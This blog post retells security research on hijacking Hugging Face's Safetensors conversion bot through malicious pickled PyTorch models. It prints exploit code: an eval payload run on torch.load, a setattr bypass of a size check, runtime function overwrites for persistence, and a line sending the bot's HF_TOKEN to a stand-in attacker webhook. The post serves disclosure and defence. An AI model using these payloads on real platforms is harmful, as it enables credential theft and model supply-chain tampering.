
Hugging Face models, a risk?

Rohit Yadav
AI & Security
Hugging Face
Security
Generative AI

Source: HiddenLayer – Hijacking Safetensors Conversion on Hugging Face

Where did it start?

Security researchers have discovered that Hugging Face, a popular online repository for AI models, has been hosting thousands of malicious files designed to steal data and compromise systems. These "malicious models" often contain hidden code that can target cloud infrastructure, steal credentials, or poison data. Hackers have even created fake profiles posing as legitimate companies to trick users into downloading the compromised models. One such model, impersonating 23andMe, was downloaded thousands of times before it was detected, with malicious code aimed at stealing AWS passwords. In response, Hugging Face has partnered with ProtectAI to integrate a scanning tool that alerts users to harmful code before downloads. This issue has gained enough attention to prompt security agencies in the U.S., Canada, and the U.K. to issue a joint warning about the risks of using unverified AI models, particularly for businesses. Hugging Face, valued at $4.5 billion, has acknowledged the growing security risks as its popularity increases within the AI research community.

Understanding The Exploits

Bypassing the Hugging Face Safetensors conversion space and its associated service bot

What did they do to prevent unsafe serialization and deserialization of models?

To help pivot the Hugging Face userbase to this safer alternative, the company created a conversion service to convert any PyTorch model contained within a repository into a Safetensors alternative via a pull request. The code (convert.py) for the conversion service is sourced directly from the Safetensors project and runs via Hugging Face Spaces, a cloud compute offering for hosting and running Python applications accessible through the browser.

The Conversion Steps

Overview:

A Gradio application is bundled with convert.py to provide a web interface for converting PyTorch models to SafeTensors format. The interface allows the user to specify a repository for conversion. Only PyTorch models (specifically those with the filename pytorch_model.bin) are supported.

Steps for Conversion:

  • The repository ID must be provided in the format: Username/repository-name
  • Example: a user provides a repository containing a valid PyTorch model.

Repository Requirements:

  • The repository must contain a PyTorch model named pytorch_model.bin.
  • The repository must be parseable by the conversion service for successful processing.

User Interface:

  • The web interface allows users to enter the repository ID and trigger the conversion process. For example, users can enter a repository they created or another one containing a model they want to convert.

Example UI Flow:

  • Step 1: The user navigates to the conversion application’s web UI.
  • Step 2: The user enters the repository ID in the required format and submits.

Conversion Process:

  • Upon a valid submission, the conversion service will (a rough sketch of this flow follows this list):
    • Convert the PyTorch model into SafeTensors format.
    • Create a pull request to the originating repository automatically.
    • The pull request will be made using the SFconvertbot user account, which acts as the conversion bot.
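
In rough terms, the steps above amount to the following minimal sketch. This is not the actual convert.py; the repository ID, file names, and commit message are placeholders, and error handling is omitted.

```python
# Minimal sketch of the conversion flow (not the real convert.py; names are placeholders).
import torch
from safetensors.torch import save_file
from huggingface_hub import HfApi, hf_hub_download, CommitOperationAdd

repo_id = "Username/repository-name"

# 1. Download the PyTorch checkpoint from the target repository.
pt_path = hf_hub_download(repo_id=repo_id, filename="pytorch_model.bin")

# 2. Load it (torch.load unpickles data.pkl, the unsafe step discussed later)
#    and re-save the tensors in the SafeTensors format.
state_dict = torch.load(pt_path, map_location="cpu")
save_file(state_dict, "model.safetensors")

# 3. Open a pull request against the originating repository, the way SFconvertbot does.
api = HfApi()  # in the real service this would authenticate as the bot
api.create_commit(
    repo_id=repo_id,
    operations=[CommitOperationAdd(path_in_repo="model.safetensors",
                                   path_or_fileobj="model.safetensors")],
    commit_message="Adding `safetensors` variant of this model",
    create_pr=True,
)
```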

No User Token Required:

  • Users do not need a user token from the repository owner to initiate the conversion.
  • This means anyone can submit a conversion request to any public repository, even if they don’t own it (see the sketch below).
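
To illustrate, a third party could drive the hosted converter programmatically along these lines; the Space ID and endpoint name here are assumptions for illustration, not verified values.

```python
# Hypothetical sketch: triggering a conversion for a public repository you do not own.
from gradio_client import Client

client = Client("safetensors/convert")  # assumed ID of the hosted conversion Space
# Argument and endpoint names are guesses; the point is that no owner token is needed.
client.predict("some-org/some-public-model", api_name="/run")
```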

Pull Request Example:

  • After successful conversion, the SFconvertbot will issue a pull request to the target repository. This PR contains the converted model in SafeTensors format.
  • Figure 3 shows the PR created by the SafeTensors conversion bot SFconvertbot.

Testing Example:

  • For testing, a repository with a specially crafted PyTorch model was used, following the above process.

Identifying the attack vector

The Safetensors conversion bot loads PyTorch files using the function torch.load(), which could potentially compromise the host machine. The script convert.py includes a safety warning that can be bypassed manually with the -y flag when running the script directly from the command line (as opposed to using the bundled Gradio application in app.py). This raises security concerns regarding the bot's handling of potentially unsafe files.

Figure 4 – convert.py safety warning.

Lo and behold, the tensors are being loaded using the torch.load() function, which can lead to arbitrary code execution if malicious code is stored within data.pkl in the PyTorch model. But what is different with the conversion bot in Hugging Face Spaces? As it turns out, nothing – they’re the same thing!

Figure 5 – torch.load() used in the convert.py conversion script.

At this point, it dawned on us. Could someone hijack the hosted conversion service using the very thing that it was designed to convert?

Crafting the exploit

We set to work putting our thoughts into practice, crafting a malicious PyTorch binary using the pre-trained AlexNet model from torchvision and injecting our first payload – eval("print('hi')") – a simple eval call that would print out 'hi'.
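
The underlying mechanism is that the pickle stream inside a PyTorch file can instruct the unpickler to call an arbitrary function on load. A simplified sketch of embedding such a payload into an AlexNet checkpoint might look like the following (class and file names are illustrative, not the original tooling):

```python
import torch
from torchvision import models

class EvalPayload:
    # pickle calls __reduce__ when serializing this object; on torch.load,
    # the unpickler then calls eval("print('hi')") while rebuilding it.
    def __reduce__(self):
        return (eval, ("print('hi')",))

model = models.alexnet(weights=None)

# torch.save pickles arbitrary Python objects into data.pkl alongside the tensors,
# so the payload object rides along with an otherwise ordinary checkpoint.
torch.save({"state_dict": model.state_dict(), "payload": EvalPayload()},
           "pytorch_model.bin")

# Anyone (or any service) that later calls torch.load("pytorch_model.bin") with the
# permissive defaults of the time prints 'hi'; recent PyTorch releases default to
# weights_only=True, which blocks this class of payload.
```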

Rather than testing on the live service, we deployed a local version of the converter service to evaluate our code execution capabilities and see if a pull request would be created.

We were able to confirm that our model had been loaded, as we could see 'hi' in the output – but with one peculiar error. It seemed that by adding our exploit code, we had changed the model's file size by more than the permitted 1% difference, which ultimately prevented the model from being converted and the bot from creating a pull request:

Figure 6 – Terminal output from a local run of convert.py.

Faced with this error, we considered two possible approaches to circumvent the problem. Either use a much larger file or use our exploit to bypass the size check. As we wanted our exploit to work on any type of PyTorch model, we decided to proceed with the latter and investigate the logic for the file size check.

Figure 7 – The check_file_size function.

The function check_file_size took two string arguments representing the filenames, then used os.stat to check their respective file sizes; if they differed too greatly (>1%), it would throw an error.
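
Based on that description, a reconstruction of the check looks roughly like this (paraphrased, not the verbatim convert.py source):

```python
import os

def check_file_size(sf_filename: str, pt_filename: str):
    # Compare the on-disk sizes of the SafeTensors output and the PyTorch input;
    # refuse the conversion if they differ by more than 1%.
    sf_size = os.stat(sf_filename).st_size
    pt_size = os.stat(pt_filename).st_size
    if (sf_size - pt_size) / pt_size > 0.01:
        raise RuntimeError(
            f"The file size difference is more than 1%:\n"
            f" - {sf_filename}: {sf_size}\n"
            f" - {pt_filename}: {pt_size}"
        )
```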

At first, we wanted to find a viable method to modify the file sizes to skip the conditional logic. However, when the PyTorch model was being loaded, the Safetensors file did not yet exist, causing the error. As our malicious model had loaded before this file size check, we knew we could use it to make changes to the convert.py script at runtime and decided to overwrite the function pointer so that a different function would get called instead of check_file_size.

As check_file_size did not return anything, we just needed a function that took in two strings and didn’t throw an exception. Our potential replacement function, os.path.join, fit these criteria perfectly. However, when we attempted to overwrite the check_file_size function, we discovered a problem: PyTorch does not permit the equals symbol ‘=’ inside any strings, preventing us from assigning a value to a function pointer in that manner. To counter this, we created the following payload, using setattr to overwrite the function pointer manually:

Figure 8 – Python code to overwrite the check_file_size function pointer.
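
A hedged reconstruction of that kind of payload follows. It assumes convert.py is importable as the module convert inside the Space, and the exec'd string avoids the '=' character per the constraint above:

```python
import torch

class SizeCheckBypass:
    # Runs inside torch.load() in the conversion Space. The exec'd string contains
    # no '=' characters: setattr rebinds convert.check_file_size to os.path.join,
    # which accepts two strings and raises nothing, so the 1% check is skipped.
    def __reduce__(self):
        return (exec, (
            "import os, convert; setattr(convert, 'check_file_size', os.path.join)",
        ))

# The payload object is then embedded into pytorch_model.bin as in the earlier sketch:
# torch.save({"state_dict": ..., "payload": SizeCheckBypass()}, "pytorch_model.bin")
```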

After modifying our PyTorch model with the above payload, we were then able to convert our model successfully using our local converter. Additionally, when we ran the model through Hugging Face’s converter, we were able to successfully create a pull request, now with the ability to compromise the system that the conversion bot was hosted on:

Figure 9 – Successfully converting a malicious PyTorch model and issuing a pull request using the Hugging Face service.

Imitation is the greatest form of flattery

While the ability to arbitrarily execute code is powerful even when operating in a sandbox, we noticed the potential for a far greater threat. All pull requests from the conversion service are generated via the SFconvertbot, an official bot belonging to Hugging Face specifically for this purpose. If an unwitting user sees a pull request from the bot stating that they have a security update for their models, they will likely accept the changes. This could allow us to upload different models in place of the one they wish to be converted, implant neural backdoors, degrade performance, or change the model entirely – posing a huge supply chain risk.

Since we knew that the bot was creating pull requests from within the same sandbox that the convert code runs in, we also knew that the credentials for the bot would more than likely be inside the sandbox, too.

Looking through the code, we saw that they were set as environment variables and could be accessed using os.environ.get("HF_TOKEN"). While we now had access to the token, we still needed a method to exfiltrate it. Since the container had to download the files and create the pull requests, we knew it would have some form of network access, so we put it to the test. To ascertain whether we could hit a domain outside the Hugging Face domain space, we created a remote webhook and sent a GET request to the hook via the malicious model:

Figure 10 – Receiving a web request from the system running the Hugging Face conversion service.
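
The exfiltration step itself amounts to something like the following sketch; the webhook URL is hypothetical, and in practice the request would be issued from inside the torch.load() payload:

```python
import os
import urllib.request

# Read the bot's token from the Space's environment and send it to an
# attacker-controlled endpoint (hypothetical URL).
token = os.environ.get("HF_TOKEN", "")
urllib.request.urlopen("https://attacker.example/hook/" + token)
```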

Success! We now had a way to exfiltrate the Hugging Face SFconvertbot token and send a malicious pull request to any repository on the site while impersonating a legitimate, official service.

Though we weren’t done quite yet.

You can’t beat the real thing

Unhappy with just impersonating the bot, we decided to check whether the service restarted each time a user tried to convert a model, so as to evaluate an opportunity for persistence. To achieve this, we created our own Hugging Face Space built on the Gradio SDK, making our Space as close to the conversion service as possible.

Figure 11 – Selecting the Gradio SDK option when creating our own Space for testing.

Now that we had the Space set up, we needed a way to imitate the conversion process. We created a Gradio application that took in user input and executed it using the built-in Python function exec. Alongside it, we included a dummy function, greet_world, which, regardless of user input, would output ‘Hello world!’.

In effect, this incredibly strenuous work allowed us to closely simulate the environment of the conversion function: we could execute code in much the same way as the torch.load() call, and we had a target function to attempt to overwrite at runtime. Our real target was the save_file function in convert.py, which saves the converted SafeTensors file to disk.

Figure 12 – Our testing code from Hugging Face Spaces.
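
Since the screenshot is not reproduced here, the following is an approximation of such a testing app rather than the exact code from Figure 12; the wrapper looks up greet_world by name on each request, which is what later makes a runtime overwrite visible:

```python
import gradio as gr

def greet_world(user_input):
    # Dummy stand-in for save_file: ignores its input and returns a fixed string.
    return "Hello world!"

def convert_stand_in(user_input):
    # Stands in for the torch.load() call site: attacker-controlled code runs here.
    exec(user_input)
    # greet_world is looked up in module globals on every call, so a payload that
    # rebinds it at runtime changes what this returns.
    return greet_world(user_input)

demo = gr.Interface(fn=convert_stand_in, inputs="text", outputs="text")
demo.launch()
```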

Once we had everything up and running, we issued a simple test to see if the application would return “Hello World” after being given some code to execute:

Figure 13 – The testing Gradio application in our own Space.

In a similar vein to how we approached bypassing the check_file_size function, we attempted to overwrite greet_world using setattr. In our exploit script, we limited ourselves to what we would be allowed to use in the context of the torch.load() call. We decided to go with the approach of creating a local file, writing the code we wanted into it, retrieving a pointer to greet_world, and replacing it with our own malicious function.
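
A sketch of the kind of payload described here (file and function names are illustrative), keeping to the same no-assignment constraint as the torch.load() payloads:

```python
# Submitted as input to the test app above and run via its exec() call.
# Drops a module to disk, imports it, and rebinds greet_world in the hosting module.
import importlib, sys
open("evil.py", "w").write("def pwned(user_input):\n    return 'pwned'\n")
sys.path.insert(0, ".")
setattr(sys.modules[greet_world.__module__], "greet_world",
        getattr(importlib.import_module("evil"), "pwned"))
```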

Figure 14 – Successfully overwriting the greet_world function.

As seen in Figure 14, the response changed from “Hello World!” to “pwned”, which was our success case. Now the real test began: we had to see whether the changes made to the Space would persist once we had refreshed it in the browser. By doing so, we could see whether the instance would restart and, by extension, whether our changes would persist. Once again, we input our initial benign prompt, except this time “pwned” was the result on our newly refreshed page.

We had persistence.

Figure 15 – Testing our initial benign prompt against the compromised Space.

We had now proved that an attacker could run arbitrary code any time someone attempted to convert their model. Without any indication to the users themselves, their models could be hijacked upon conversion. What’s more, if a user wished to convert their own private repository, we could in effect steal their Hugging Face token, compromise their repository, and view all private repositories, datasets, and models to which that user had access.

How does this affect everyone?

The Hugging Face platform hosts over 500,000 machine-learning models, many of which are distributed in file formats that are vulnerable to malicious code injection. To address this, Hugging Face introduced the Safetensors conversion bot, which converts models into a safer, tensor-only format that cannot carry executable code. However, as shown above, this service can itself be hijacked, posing a potential supply chain risk for major organizations, since any user can submit a conversion pull request for a public repository, not just the original model creator. This raises concerns about the security of changes made to models, as organizations like Microsoft and Google have accepted pull requests from the bot without fully verifying the changes. Attackers could exploit this process to introduce backdoors into models, which could trigger malicious behavior such as bypassing security systems or spreading disinformation. Since machine learning models are stored in non-human-readable formats, detecting such tampering requires programmatic comparisons, making it difficult to notice unauthorized changes. Users should thoroughly investigate repositories for potential tampering and secure their model weights and biases against such risks.
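
As a starting point for such programmatic comparisons, the tensors proposed in a conversion pull request can be checked against the original checkpoint before merging. A minimal sketch, assuming the checkpoint is a flat state dict and a PyTorch version recent enough to support weights_only:

```python
import torch
from safetensors.torch import load_file

# Compare a proposed SafeTensors file against the original PyTorch checkpoint.
original = torch.load("pytorch_model.bin", map_location="cpu", weights_only=True)
converted = load_file("model.safetensors")

assert set(original) == set(converted), "tensor names differ"
for name, tensor in original.items():
    if not torch.equal(tensor, converted[name]):
        print(f"Mismatch in tensor: {name}")
```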
